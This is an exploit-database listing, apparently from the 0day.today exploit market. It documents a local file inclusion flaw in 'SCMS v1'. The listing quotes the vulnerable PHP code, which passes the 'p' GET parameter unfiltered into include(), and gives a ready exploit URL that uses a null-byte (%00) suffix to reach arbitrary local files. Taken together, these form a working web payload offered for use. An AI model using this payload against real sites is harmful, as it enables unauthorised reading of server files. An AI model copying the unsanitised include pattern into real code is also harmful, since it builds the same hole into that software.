[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SCMS v1 (index.php p) Local File Inclusion Vulnerability

Author
ahmadbady
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4700
Category
web applications
Date add
18-01-2009
Platform
unsorted
========================================================
SCMS v1 (index.php p) Local File Inclusion Vulnerability
========================================================


                           --:local file include:--
---------------------------------  
script:simple content management system v 1
   
-------------------------------------------------------
download from:http://futurekast.com/fcms/php/SCMSv1.zip
   
-------------------------------------------------------

...............................................
vul:/index.php line 34:

<?php 
 if (!isset($_GET['p']))
  include("../SCMSv1/includes/default.txt");
 } else include("includes/" . $_GET['p'] . ".txt");
 ?>
-------------------------------------------
-------------------------------------------
xpl:

http://127.0.0.1/path/index.php?p=[Lfi]%00

***************************************************
***************************************************
---------------------------------------------------




#  0day.today [2024-12-25]  #